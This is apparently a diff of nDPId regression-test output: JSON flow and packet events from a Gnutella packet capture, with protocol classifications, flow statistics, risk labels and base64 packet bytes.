-00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00HEAAIARI3sKAAIPfCy+kXAJJ7oAIMCGR05EED8oAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":191700,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uoEAAIARu5gKAAIPXFhcOHAJUhEAIBhcR05EED8pAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3067,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":191700,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191700,"pkt":"UlQAEjUCCAAn5uVZCABFAAA06UYAAIARhsYKAAIPW7Ni6nAJGMoAIEuVR05EED8qAQFUC1FLUlAGUk5BXS\/iNQlw"} @@ -1320,24 +1305,29 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":191703,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191703,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lsMAAIARXJwKAAIPVvTkVnAJJ5MAIMANR05EED87AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3085,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VboAAIARb2MKAAIPpanD43AJGMoAIKCTR05EED88AQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3086,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":191704,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":191704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0dUAAAIARISYKAAIPsKPnoHAJGMoAIHHbR05EED89AQFUC1FLUlAGUk5BXS\/iNQlw"} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":180000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":12876,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":180000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":180000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":180000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":13092,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":70230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":756,"flow_tot_l4_payload_len":1058,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":68109,"flow_last_seen":70047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 